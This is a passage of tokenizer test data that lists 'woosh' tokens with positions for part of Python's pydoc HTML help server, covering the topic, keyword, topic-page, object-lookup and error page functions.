woosh.Token(woosh.OP, ',', 2567, 58, 2567, 59),
woosh.Token(woosh.STRING, "'#ffffff'", 2568, 12, 2568, 21),
woosh.Token(woosh.OP, ',', 2568, 21, 2568, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2568, 23, 2568, 32),
woosh.Token(woosh.OP, ')', 2568, 32, 2568, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2568, 33, 2569, 0),
woosh.Token(woosh.NAME, 'names', 2569, 8, 2569, 13),
woosh.Token(woosh.OP, '=', 2569, 14, 2569, 15),
woosh.Token(woosh.NAME, 'sorted', 2569, 16, 2569, 22),
woosh.Token(woosh.OP, '(', 2569, 22, 2569, 23),
woosh.Token(woosh.NAME, 'Helper', 2569, 23, 2569, 29),
woosh.Token(woosh.OP, '.', 2569, 29, 2569, 30),
woosh.Token(woosh.NAME, 'topics', 2569, 30, 2569, 36),
woosh.Token(woosh.OP, '.', 2569, 36, 2569, 37),
woosh.Token(woosh.NAME, 'keys', 2569, 37, 2569, 41),
woosh.Token(woosh.OP, '(', 2569, 41, 2569, 42),
woosh.Token(woosh.OP, ')', 2569, 42, 2569, 43),
woosh.Token(woosh.OP, ')', 2569, 43, 2569, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2569, 44, 2570, 0),
woosh.Token(woosh.NAME, 'contents', 2571, 8, 2571, 16),
woosh.Token(woosh.OP, '=', 2571, 17, 2571, 18),
woosh.Token(woosh.NAME, 'html', 2571, 19, 2571, 23),
woosh.Token(woosh.OP, '.', 2571, 23, 2571, 24),
woosh.Token(woosh.NAME, 'multicolumn', 2571, 24, 2571, 35),
woosh.Token(woosh.OP, '(', 2571, 35, 2571, 36),
woosh.Token(woosh.NAME, 'names', 2571, 36, 2571, 41),
woosh.Token(woosh.OP, ',', 2571, 41, 2571, 42),
woosh.Token(woosh.NAME, 'bltinlink', 2571, 43, 2571, 52),
woosh.Token(woosh.OP, ')', 2571, 52, 2571, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2571, 53, 2572, 0),
woosh.Token(woosh.NAME, 'contents', 2572, 8, 2572, 16),
woosh.Token(woosh.OP, '=', 2572, 17, 2572, 18),
woosh.Token(woosh.NAME, 'heading', 2572, 19, 2572, 26),
woosh.Token(woosh.OP, '+', 2572, 27, 2572, 28),
woosh.Token(woosh.NAME, 'html', 2572, 29, 2572, 33),
woosh.Token(woosh.OP, '.', 2572, 33, 2572, 34),
woosh.Token(woosh.NAME, 'bigsection', 2572, 34, 2572, 44),
woosh.Token(woosh.OP, '(', 2572, 44, 2572, 45),
woosh.Token(woosh.STRING, "'Topics'", 2573, 12, 2573, 20),
woosh.Token(woosh.OP, ',', 2573, 20, 2573, 21),
woosh.Token(woosh.STRING, "'#ffffff'", 2573, 22, 2573, 31),
woosh.Token(woosh.OP, ',', 2573, 31, 2573, 32),
woosh.Token(woosh.STRING, "'#ee77aa'", 2573, 33, 2573, 42),
woosh.Token(woosh.OP, ',', 2573, 42, 2573, 43),
woosh.Token(woosh.NAME, 'contents', 2573, 44, 2573, 52),
woosh.Token(woosh.OP, ')', 2573, 52, 2573, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2573, 53, 2574, 0),
woosh.Token(woosh.NAME, 'return', 2574, 8, 2574, 14),
woosh.Token(woosh.STRING, "'Topics'", 2574, 15, 2574, 23),
woosh.Token(woosh.OP, ',', 2574, 23, 2574, 24),
woosh.Token(woosh.NAME, 'contents', 2574, 25, 2574, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2574, 33, 2575, 0),
woosh.Token(woosh.DEDENT, ' ', 2576, 0, 2576, 4),
woosh.Token(woosh.NAME, 'def', 2576, 4, 2576, 7),
woosh.Token(woosh.NAME, 'html_keywords', 2576, 8, 2576, 21),
woosh.Token(woosh.OP, '(', 2576, 21, 2576, 22),
woosh.Token(woosh.OP, ')', 2576, 22, 2576, 23),
woosh.Token(woosh.OP, ':', 2576, 23, 2576, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2576, 24, 2577, 0),
woosh.Token(woosh.INDENT, ' ', 2577, 0, 2577, 8),
woosh.Token(woosh.STRING, '"""Index of keywords."""', 2577, 8, 2577, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2577, 32, 2578, 0),
woosh.Token(woosh.NAME, 'heading', 2578, 8, 2578, 15),
woosh.Token(woosh.OP, '=', 2578, 16, 2578, 17),
woosh.Token(woosh.NAME, 'html', 2578, 18, 2578, 22),
woosh.Token(woosh.OP, '.', 2578, 22, 2578, 23),
woosh.Token(woosh.NAME, 'heading', 2578, 23, 2578, 30),
woosh.Token(woosh.OP, '(', 2578, 30, 2578, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>INDEX</strong></big></big>'", 2579, 12, 2579, 58),
woosh.Token(woosh.OP, ',', 2579, 58, 2579, 59),
woosh.Token(woosh.STRING, "'#ffffff'", 2580, 12, 2580, 21),
woosh.Token(woosh.OP, ',', 2580, 21, 2580, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2580, 23, 2580, 32),
woosh.Token(woosh.OP, ')', 2580, 32, 2580, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2580, 33, 2581, 0),
woosh.Token(woosh.NAME, 'names', 2581, 8, 2581, 13),
woosh.Token(woosh.OP, '=', 2581, 14, 2581, 15),
woosh.Token(woosh.NAME, 'sorted', 2581, 16, 2581, 22),
woosh.Token(woosh.OP, '(', 2581, 22, 2581, 23),
woosh.Token(woosh.NAME, 'Helper', 2581, 23, 2581, 29),
woosh.Token(woosh.OP, '.', 2581, 29, 2581, 30),
woosh.Token(woosh.NAME, 'keywords', 2581, 30, 2581, 38),
woosh.Token(woosh.OP, '.', 2581, 38, 2581, 39),
woosh.Token(woosh.NAME, 'keys', 2581, 39, 2581, 43),
woosh.Token(woosh.OP, '(', 2581, 43, 2581, 44),
woosh.Token(woosh.OP, ')', 2581, 44, 2581, 45),
woosh.Token(woosh.OP, ')', 2581, 45, 2581, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2581, 46, 2582, 0),
woosh.Token(woosh.NAME, 'def', 2583, 8, 2583, 11),
woosh.Token(woosh.NAME, 'bltinlink', 2583, 12, 2583, 21),
woosh.Token(woosh.OP, '(', 2583, 21, 2583, 22),
woosh.Token(woosh.NAME, 'name', 2583, 22, 2583, 26),
woosh.Token(woosh.OP, ')', 2583, 26, 2583, 27),
woosh.Token(woosh.OP, ':', 2583, 27, 2583, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2583, 28, 2584, 0),
woosh.Token(woosh.INDENT, ' ', 2584, 0, 2584, 12),
woosh.Token(woosh.NAME, 'return', 2584, 12, 2584, 18),
woosh.Token(woosh.STRING, '\'<a href="topic?key=%s">%s</a>\'', 2584, 19, 2584, 50),
woosh.Token(woosh.OP, '%', 2584, 51, 2584, 52),
woosh.Token(woosh.OP, '(', 2584, 53, 2584, 54),
woosh.Token(woosh.NAME, 'name', 2584, 54, 2584, 58),
woosh.Token(woosh.OP, ',', 2584, 58, 2584, 59),
woosh.Token(woosh.NAME, 'name', 2584, 60, 2584, 64),
woosh.Token(woosh.OP, ')', 2584, 64, 2584, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2584, 65, 2585, 0),
woosh.Token(woosh.DEDENT, ' ', 2586, 0, 2586, 8),
woosh.Token(woosh.NAME, 'contents', 2586, 8, 2586, 16),
woosh.Token(woosh.OP, '=', 2586, 17, 2586, 18),
woosh.Token(woosh.NAME, 'html', 2586, 19, 2586, 23),
woosh.Token(woosh.OP, '.', 2586, 23, 2586, 24),
woosh.Token(woosh.NAME, 'multicolumn', 2586, 24, 2586, 35),
woosh.Token(woosh.OP, '(', 2586, 35, 2586, 36),
woosh.Token(woosh.NAME, 'names', 2586, 36, 2586, 41),
woosh.Token(woosh.OP, ',', 2586, 41, 2586, 42),
woosh.Token(woosh.NAME, 'bltinlink', 2586, 43, 2586, 52),
woosh.Token(woosh.OP, ')', 2586, 52, 2586, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2586, 53, 2587, 0),
woosh.Token(woosh.NAME, 'contents', 2587, 8, 2587, 16),
woosh.Token(woosh.OP, '=', 2587, 17, 2587, 18),
woosh.Token(woosh.NAME, 'heading', 2587, 19, 2587, 26),
woosh.Token(woosh.OP, '+', 2587, 27, 2587, 28),
woosh.Token(woosh.NAME, 'html', 2587, 29, 2587, 33),
woosh.Token(woosh.OP, '.', 2587, 33, 2587, 34),
woosh.Token(woosh.NAME, 'bigsection', 2587, 34, 2587, 44),
woosh.Token(woosh.OP, '(', 2587, 44, 2587, 45),
woosh.Token(woosh.STRING, "'Keywords'", 2588, 12, 2588, 22),
woosh.Token(woosh.OP, ',', 2588, 22, 2588, 23),
woosh.Token(woosh.STRING, "'#ffffff'", 2588, 24, 2588, 33),
woosh.Token(woosh.OP, ',', 2588, 33, 2588, 34),
woosh.Token(woosh.STRING, "'#ee77aa'", 2588, 35, 2588, 44),
woosh.Token(woosh.OP, ',', 2588, 44, 2588, 45),
woosh.Token(woosh.NAME, 'contents', 2588, 46, 2588, 54),
woosh.Token(woosh.OP, ')', 2588, 54, 2588, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2588, 55, 2589, 0),
woosh.Token(woosh.NAME, 'return', 2589, 8, 2589, 14),
woosh.Token(woosh.STRING, "'Keywords'", 2589, 15, 2589, 25),
woosh.Token(woosh.OP, ',', 2589, 25, 2589, 26),
woosh.Token(woosh.NAME, 'contents', 2589, 27, 2589, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2589, 35, 2590, 0),
woosh.Token(woosh.DEDENT, ' ', 2591, 0, 2591, 4),
woosh.Token(woosh.NAME, 'def', 2591, 4, 2591, 7),
woosh.Token(woosh.NAME, 'html_topicpage', 2591, 8, 2591, 22),
woosh.Token(woosh.OP, '(', 2591, 22, 2591, 23),
woosh.Token(woosh.NAME, 'topic', 2591, 23, 2591, 28),
woosh.Token(woosh.OP, ')', 2591, 28, 2591, 29),
woosh.Token(woosh.OP, ':', 2591, 29, 2591, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2591, 30, 2592, 0),
woosh.Token(woosh.INDENT, ' ', 2592, 0, 2592, 8),
woosh.Token(woosh.STRING, '"""Topic or keyword help page."""', 2592, 8, 2592, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2592, 41, 2593, 0),
woosh.Token(woosh.NAME, 'buf', 2593, 8, 2593, 11),
woosh.Token(woosh.OP, '=', 2593, 12, 2593, 13),
woosh.Token(woosh.NAME, 'io', 2593, 14, 2593, 16),
woosh.Token(woosh.OP, '.', 2593, 16, 2593, 17),
woosh.Token(woosh.NAME, 'StringIO', 2593, 17, 2593, 25),
woosh.Token(woosh.OP, '(', 2593, 25, 2593, 26),
woosh.Token(woosh.OP, ')', 2593, 26, 2593, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2593, 27, 2594, 0),
woosh.Token(woosh.NAME, 'htmlhelp', 2594, 8, 2594, 16),
woosh.Token(woosh.OP, '=', 2594, 17, 2594, 18),
woosh.Token(woosh.NAME, 'Helper', 2594, 19, 2594, 25),
woosh.Token(woosh.OP, '(', 2594, 25, 2594, 26),
woosh.Token(woosh.NAME, 'buf', 2594, 26, 2594, 29),
woosh.Token(woosh.OP, ',', 2594, 29, 2594, 30),
woosh.Token(woosh.NAME, 'buf', 2594, 31, 2594, 34),
woosh.Token(woosh.OP, ')', 2594, 34, 2594, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2594, 35, 2595, 0),
woosh.Token(woosh.NAME, 'contents', 2595, 8, 2595, 16),
woosh.Token(woosh.OP, ',', 2595, 16, 2595, 17),
woosh.Token(woosh.NAME, 'xrefs', 2595, 18, 2595, 23),
woosh.Token(woosh.OP, '=', 2595, 24, 2595, 25),
woosh.Token(woosh.NAME, 'htmlhelp', 2595, 26, 2595, 34),
woosh.Token(woosh.OP, '.', 2595, 34, 2595, 35),
woosh.Token(woosh.NAME, '_gettopic', 2595, 35, 2595, 44),
woosh.Token(woosh.OP, '(', 2595, 44, 2595, 45),
woosh.Token(woosh.NAME, 'topic', 2595, 45, 2595, 50),
woosh.Token(woosh.OP, ')', 2595, 50, 2595, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 2595, 51, 2596, 0),
woosh.Token(woosh.NAME, 'if', 2596, 8, 2596, 10),
woosh.Token(woosh.NAME, 'topic', 2596, 11, 2596, 16),
woosh.Token(woosh.NAME, 'in', 2596, 17, 2596, 19),
woosh.Token(woosh.NAME, 'htmlhelp', 2596, 20, 2596, 28),
woosh.Token(woosh.OP, '.', 2596, 28, 2596, 29),
woosh.Token(woosh.NAME, 'keywords', 2596, 29, 2596, 37),
woosh.Token(woosh.OP, ':', 2596, 37, 2596, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2596, 38, 2597, 0),
woosh.Token(woosh.INDENT, ' ', 2597, 0, 2597, 12),
woosh.Token(woosh.NAME, 'title', 2597, 12, 2597, 17),
woosh.Token(woosh.OP, '=', 2597, 18, 2597, 19),
woosh.Token(woosh.STRING, "'KEYWORD'", 2597, 20, 2597, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2597, 29, 2598, 0),
woosh.Token(woosh.DEDENT, ' ', 2598, 0, 2598, 8),
woosh.Token(woosh.NAME, 'else', 2598, 8, 2598, 12),
woosh.Token(woosh.OP, ':', 2598, 12, 2598, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 2598, 13, 2599, 0),
woosh.Token(woosh.INDENT, ' ', 2599, 0, 2599, 12),
woosh.Token(woosh.NAME, 'title', 2599, 12, 2599, 17),
woosh.Token(woosh.OP, '=', 2599, 18, 2599, 19),
woosh.Token(woosh.STRING, "'TOPIC'", 2599, 20, 2599, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2599, 27, 2600, 0),
woosh.Token(woosh.DEDENT, ' ', 2600, 0, 2600, 8),
woosh.Token(woosh.NAME, 'heading', 2600, 8, 2600, 15),
woosh.Token(woosh.OP, '=', 2600, 16, 2600, 17),
woosh.Token(woosh.NAME, 'html', 2600, 18, 2600, 22),
woosh.Token(woosh.OP, '.', 2600, 22, 2600, 23),
woosh.Token(woosh.NAME, 'heading', 2600, 23, 2600, 30),
woosh.Token(woosh.OP, '(', 2600, 30, 2600, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>%s</strong></big></big>'", 2601, 12, 2601, 55),
woosh.Token(woosh.OP, '%', 2601, 56, 2601, 57),
woosh.Token(woosh.NAME, 'title', 2601, 58, 2601, 63),
woosh.Token(woosh.OP, ',', 2601, 63, 2601, 64),
woosh.Token(woosh.STRING, "'#ffffff'", 2602, 12, 2602, 21),
woosh.Token(woosh.OP, ',', 2602, 21, 2602, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2602, 23, 2602, 32),
woosh.Token(woosh.OP, ')', 2602, 32, 2602, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2602, 33, 2603, 0),
woosh.Token(woosh.NAME, 'contents', 2603, 8, 2603, 16),
woosh.Token(woosh.OP, '=', 2603, 17, 2603, 18),
woosh.Token(woosh.STRING, "'<pre>%s</pre>'", 2603, 19, 2603, 34),
woosh.Token(woosh.OP, '%', 2603, 35, 2603, 36),
woosh.Token(woosh.NAME, 'html', 2603, 37, 2603, 41),
woosh.Token(woosh.OP, '.', 2603, 41, 2603, 42),
woosh.Token(woosh.NAME, 'markup', 2603, 42, 2603, 48),
woosh.Token(woosh.OP, '(', 2603, 48, 2603, 49),
woosh.Token(woosh.NAME, 'contents', 2603, 49, 2603, 57),
woosh.Token(woosh.OP, ')', 2603, 57, 2603, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2603, 58, 2604, 0),
woosh.Token(woosh.NAME, 'contents', 2604, 8, 2604, 16),
woosh.Token(woosh.OP, '=', 2604, 17, 2604, 18),
woosh.Token(woosh.NAME, 'html', 2604, 19, 2604, 23),
woosh.Token(woosh.OP, '.', 2604, 23, 2604, 24),
woosh.Token(woosh.NAME, 'bigsection', 2604, 24, 2604, 34),
woosh.Token(woosh.OP, '(', 2604, 34, 2604, 35),
woosh.Token(woosh.NAME, 'topic', 2604, 35, 2604, 40),
woosh.Token(woosh.OP, ',', 2604, 41, 2604, 42),
woosh.Token(woosh.STRING, "'#ffffff'", 2604, 43, 2604, 52),
woosh.Token(woosh.OP, ',', 2604, 52, 2604, 53),
woosh.Token(woosh.STRING, "'#ee77aa'", 2604, 53, 2604, 62),
woosh.Token(woosh.OP, ',', 2604, 62, 2604, 63),
woosh.Token(woosh.NAME, 'contents', 2604, 64, 2604, 72),
woosh.Token(woosh.OP, ')', 2604, 72, 2604, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 2604, 73, 2605, 0),
woosh.Token(woosh.NAME, 'if', 2605, 8, 2605, 10),
woosh.Token(woosh.NAME, 'xrefs', 2605, 11, 2605, 16),
woosh.Token(woosh.OP, ':', 2605, 16, 2605, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2605, 17, 2606, 0),
woosh.Token(woosh.INDENT, ' ', 2606, 0, 2606, 12),
woosh.Token(woosh.NAME, 'xrefs', 2606, 12, 2606, 17),
woosh.Token(woosh.OP, '=', 2606, 18, 2606, 19),
woosh.Token(woosh.NAME, 'sorted', 2606, 20, 2606, 26),
woosh.Token(woosh.OP, '(', 2606, 26, 2606, 27),
woosh.Token(woosh.NAME, 'xrefs', 2606, 27, 2606, 32),
woosh.Token(woosh.OP, '.', 2606, 32, 2606, 33),
woosh.Token(woosh.NAME, 'split', 2606, 33, 2606, 38),
woosh.Token(woosh.OP, '(', 2606, 38, 2606, 39),
woosh.Token(woosh.OP, ')', 2606, 39, 2606, 40),
woosh.Token(woosh.OP, ')', 2606, 40, 2606, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2606, 41, 2607, 0),
woosh.Token(woosh.NAME, 'def', 2608, 12, 2608, 15),
woosh.Token(woosh.NAME, 'bltinlink', 2608, 16, 2608, 25),
woosh.Token(woosh.OP, '(', 2608, 25, 2608, 26),
woosh.Token(woosh.NAME, 'name', 2608, 26, 2608, 30),
woosh.Token(woosh.OP, ')', 2608, 30, 2608, 31),
woosh.Token(woosh.OP, ':', 2608, 31, 2608, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2608, 32, 2609, 0),
woosh.Token(woosh.INDENT, ' ', 2609, 0, 2609, 16),
woosh.Token(woosh.NAME, 'return', 2609, 16, 2609, 22),
woosh.Token(woosh.STRING, '\'<a href="topic?key=%s">%s</a>\'', 2609, 23, 2609, 54),
woosh.Token(woosh.OP, '%', 2609, 55, 2609, 56),
woosh.Token(woosh.OP, '(', 2609, 57, 2609, 58),
woosh.Token(woosh.NAME, 'name', 2609, 58, 2609, 62),
woosh.Token(woosh.OP, ',', 2609, 62, 2609, 63),
woosh.Token(woosh.NAME, 'name', 2609, 64, 2609, 68),
woosh.Token(woosh.OP, ')', 2609, 68, 2609, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2609, 69, 2610, 0),
woosh.Token(woosh.DEDENT, ' ', 2611, 0, 2611, 12),
woosh.Token(woosh.NAME, 'xrefs', 2611, 12, 2611, 17),
woosh.Token(woosh.OP, '=', 2611, 18, 2611, 19),
woosh.Token(woosh.NAME, 'html', 2611, 20, 2611, 24),
woosh.Token(woosh.OP, '.', 2611, 24, 2611, 25),
woosh.Token(woosh.NAME, 'multicolumn', 2611, 25, 2611, 36),
woosh.Token(woosh.OP, '(', 2611, 36, 2611, 37),
woosh.Token(woosh.NAME, 'xrefs', 2611, 37, 2611, 42),
woosh.Token(woosh.OP, ',', 2611, 42, 2611, 43),
woosh.Token(woosh.NAME, 'bltinlink', 2611, 44, 2611, 53),
woosh.Token(woosh.OP, ')', 2611, 53, 2611, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2611, 54, 2612, 0),
woosh.Token(woosh.NAME, 'xrefs', 2612, 12, 2612, 17),
woosh.Token(woosh.OP, '=', 2612, 18, 2612, 19),
woosh.Token(woosh.NAME, 'html', 2612, 20, 2612, 24),
woosh.Token(woosh.OP, '.', 2612, 24, 2612, 25),
woosh.Token(woosh.NAME, 'section', 2612, 25, 2612, 32),
woosh.Token(woosh.OP, '(', 2612, 32, 2612, 33),
woosh.Token(woosh.STRING, "'Related help topics: '", 2612, 33, 2612, 56),
woosh.Token(woosh.OP, ',', 2612, 56, 2612, 57),
woosh.Token(woosh.STRING, "'#ffffff'", 2613, 33, 2613, 42),
woosh.Token(woosh.OP, ',', 2613, 42, 2613, 43),
woosh.Token(woosh.STRING, "'#ee77aa'", 2613, 44, 2613, 53),
woosh.Token(woosh.OP, ',', 2613, 53, 2613, 54),
woosh.Token(woosh.NAME, 'xrefs', 2613, 55, 2613, 60),
woosh.Token(woosh.OP, ')', 2613, 60, 2613, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 2613, 61, 2614, 0),
woosh.Token(woosh.DEDENT, ' ', 2614, 0, 2614, 8),
woosh.Token(woosh.NAME, 'return', 2614, 8, 2614, 14),
woosh.Token(woosh.OP, '(', 2614, 15, 2614, 16),
woosh.Token(woosh.STRING, "'%s %s'", 2614, 16, 2614, 23),
woosh.Token(woosh.OP, '%', 2614, 24, 2614, 25),
woosh.Token(woosh.OP, '(', 2614, 26, 2614, 27),
woosh.Token(woosh.NAME, 'title', 2614, 27, 2614, 32),
woosh.Token(woosh.OP, ',', 2614, 32, 2614, 33),
woosh.Token(woosh.NAME, 'topic', 2614, 34, 2614, 39),
woosh.Token(woosh.OP, ')', 2614, 39, 2614, 40),
woosh.Token(woosh.OP, ',', 2614, 40, 2614, 41),
woosh.Token(woosh.STRING, "''", 2615, 16, 2615, 18),
woosh.Token(woosh.OP, '.', 2615, 18, 2615, 19),
woosh.Token(woosh.NAME, 'join', 2615, 19, 2615, 23),
woosh.Token(woosh.OP, '(', 2615, 23, 2615, 24),
woosh.Token(woosh.OP, '(', 2615, 24, 2615, 25),
woosh.Token(woosh.NAME, 'heading', 2615, 25, 2615, 32),
woosh.Token(woosh.OP, ',', 2615, 32, 2615, 33),
woosh.Token(woosh.NAME, 'contents', 2615, 34, 2615, 42),
woosh.Token(woosh.OP, ',', 2615, 42, 2615, 43),
woosh.Token(woosh.NAME, 'xrefs', 2615, 44, 2615, 49),
woosh.Token(woosh.OP, ')', 2615, 49, 2615, 50),
woosh.Token(woosh.OP, ')', 2615, 50, 2615, 51),
woosh.Token(woosh.OP, ')', 2615, 51, 2615, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2615, 52, 2616, 0),
woosh.Token(woosh.DEDENT, ' ', 2617, 0, 2617, 4),
woosh.Token(woosh.NAME, 'def', 2617, 4, 2617, 7),
woosh.Token(woosh.NAME, 'html_getobj', 2617, 8, 2617, 19),
woosh.Token(woosh.OP, '(', 2617, 19, 2617, 20),
woosh.Token(woosh.NAME, 'url', 2617, 20, 2617, 23),
woosh.Token(woosh.OP, ')', 2617, 23, 2617, 24),
woosh.Token(woosh.OP, ':', 2617, 24, 2617, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2617, 25, 2618, 0),
woosh.Token(woosh.INDENT, ' ', 2618, 0, 2618, 8),
woosh.Token(woosh.NAME, 'obj', 2618, 8, 2618, 11),
woosh.Token(woosh.OP, '=', 2618, 12, 2618, 13),
woosh.Token(woosh.NAME, 'locate', 2618, 14, 2618, 20),
woosh.Token(woosh.OP, '(', 2618, 20, 2618, 21),
woosh.Token(woosh.NAME, 'url', 2618, 21, 2618, 24),
woosh.Token(woosh.OP, ',', 2618, 24, 2618, 25),
woosh.Token(woosh.NAME, 'forceload', 2618, 26, 2618, 35),
woosh.Token(woosh.OP, '=', 2618, 35, 2618, 36),
woosh.Token(woosh.NUMBER, '1', 2618, 36, 2618, 37),
woosh.Token(woosh.OP, ')', 2618, 37, 2618, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2618, 38, 2619, 0),
woosh.Token(woosh.NAME, 'if', 2619, 8, 2619, 10),
woosh.Token(woosh.NAME, 'obj', 2619, 11, 2619, 14),
woosh.Token(woosh.NAME, 'is', 2619, 15, 2619, 17),
woosh.Token(woosh.NAME, 'None', 2619, 18, 2619, 22),
woosh.Token(woosh.NAME, 'and', 2619, 23, 2619, 26),
woosh.Token(woosh.NAME, 'url', 2619, 27, 2619, 30),
woosh.Token(woosh.OP, '!=', 2619, 31, 2619, 33),
woosh.Token(woosh.STRING, "'None'", 2619, 34, 2619, 40),
woosh.Token(woosh.OP, ':', 2619, 40, 2619, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2619, 41, 2620, 0),
woosh.Token(woosh.INDENT, ' ', 2620, 0, 2620, 12),
woosh.Token(woosh.NAME, 'raise', 2620, 12, 2620, 17),
woosh.Token(woosh.NAME, 'ValueError', 2620, 18, 2620, 28),
woosh.Token(woosh.OP, '(', 2620, 28, 2620, 29),
woosh.Token(woosh.STRING, "'could not find object'", 2620, 29, 2620, 52),
woosh.Token(woosh.OP, ')', 2620, 52, 2620, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2620, 53, 2621, 0),
woosh.Token(woosh.DEDENT, ' ', 2621, 0, 2621, 8),
woosh.Token(woosh.NAME, 'title', 2621, 8, 2621, 13),
woosh.Token(woosh.OP, '=', 2621, 14, 2621, 15),
woosh.Token(woosh.NAME, 'describe', 2621, 16, 2621, 24),
woosh.Token(woosh.OP, '(', 2621, 24, 2621, 25),
woosh.Token(woosh.NAME, 'obj', 2621, 25, 2621, 28),
woosh.Token(woosh.OP, ')', 2621, 28, 2621, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2621, 29, 2622, 0),
woosh.Token(woosh.NAME, 'content', 2622, 8, 2622, 15),
woosh.Token(woosh.OP, '=', 2622, 16, 2622, 17),
woosh.Token(woosh.NAME, 'html', 2622, 18, 2622, 22),
woosh.Token(woosh.OP, '.', 2622, 22, 2622, 23),
woosh.Token(woosh.NAME, 'document', 2622, 23, 2622, 31),
woosh.Token(woosh.OP, '(', 2622, 31, 2622, 32),
woosh.Token(woosh.NAME, 'obj', 2622, 32, 2622, 35),
woosh.Token(woosh.OP, ',', 2622, 35, 2622, 36),
woosh.Token(woosh.NAME, 'url', 2622, 37, 2622, 40),
woosh.Token(woosh.OP, ')', 2622, 40, 2622, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2622, 41, 2623, 0),
woosh.Token(woosh.NAME, 'return', 2623, 8, 2623, 14),
woosh.Token(woosh.NAME, 'title', 2623, 15, 2623, 20),
woosh.Token(woosh.OP, ',', 2623, 20, 2623, 21),
woosh.Token(woosh.NAME, 'content', 2623, 22, 2623, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2623, 29, 2624, 0),
woosh.Token(woosh.DEDENT, ' ', 2625, 0, 2625, 4),
woosh.Token(woosh.NAME, 'def', 2625, 4, 2625, 7),
woosh.Token(woosh.NAME, 'html_error', 2625, 8, 2625, 18),
woosh.Token(woosh.OP, '(', 2625, 18, 2625, 19),
woosh.Token(woosh.NAME, 'url', 2625, 19, 2625, 22),
woosh.Token(woosh.OP, ',', 2625, 22, 2625, 23),
woosh.Token(woosh.NAME, 'exc', 2625, 24, 2625, 27),
woosh.Token(woosh.OP, ')', 2625, 27, 2625, 28),
woosh.Token(woosh.OP, ':', 2625, 28, 2625, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2625, 29, 2626, 0),
woosh.Token(woosh.INDENT, ' ', 2626, 0, 2626, 8),
woosh.Token(woosh.NAME, 'heading', 2626, 8, 2626, 15),
woosh.Token(woosh.OP, '=', 2626, 16, 2626, 17),
woosh.Token(woosh.NAME, 'html', 2626, 18, 2626, 22),
woosh.Token(woosh.OP, '.', 2626, 22, 2626, 23),
woosh.Token(woosh.NAME, 'heading', 2626, 23, 2626, 30),
woosh.Token(woosh.OP, '(', 2626, 30, 2626, 31),
woosh.Token(woosh.STRING, "'<big><big><strong>Error</strong></big></big>'", 2627, 12, 2627, 58),
woosh.Token(woosh.OP, ',', 2627, 58, 2627, 59),
woosh.Token(woosh.STRING, "'#ffffff'", 2628, 12, 2628, 21),
woosh.Token(woosh.OP, ',', 2628, 21, 2628, 22),
woosh.Token(woosh.STRING, "'#7799ee'", 2628, 23, 2628, 32),
woosh.Token(woosh.OP, ')', 2628, 32, 2628, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2628, 33, 2629, 0),
woosh.Token(woosh.NAME, 'contents', 2629, 8, 2629, 16),
woosh.Token(woosh.OP, '=', 2629, 17, 2629, 18),
woosh.Token(woosh.STRING, "'<br>'", 2629, 19, 2629, 25),
woosh.Token(woosh.OP, '.', 2629, 25, 2629, 26),
woosh.Token(woosh.NAME, 'join', 2629, 26, 2629, 30),
woosh.Token(woosh.OP, '(', 2629, 30, 2629, 31),
woosh.Token(woosh.NAME, 'html', 2629, 31, 2629, 35),
woosh.Token(woosh.OP, '.', 2629, 35, 2629, 36),
woosh.Token(woosh.NAME, 'escape', 2629, 36, 2629, 42),
woosh.Token(woosh.OP, '(', 2629, 42, 2629, 43),
woosh.Token(woosh.NAME, 'line', 2629, 43, 2629, 47),
woosh.Token(woosh.OP, ')', 2629, 47, 2629, 48),
woosh.Token(woosh.NAME, 'for', 2629, 49, 2629, 52),
woosh.Token(woosh.NAME, 'line', 2629, 53, 2629, 57),
woosh.Token(woosh.NAME, 'in', 2629, 58, 2629, 60),
woosh.Token(woosh.NAME, 'format_exception_only', 2630, 31, 2630, 52),
woosh.Token(woosh.OP, '(', 2630, 52, 2630, 53),
woosh.Token(woosh.NAME, 'type', 2630, 53, 2630, 57),
woosh.Token(woosh.OP, '(', 2630, 57, 2630, 58),
woosh.Token(woosh.NAME, 'exc', 2630, 58, 2630, 61),
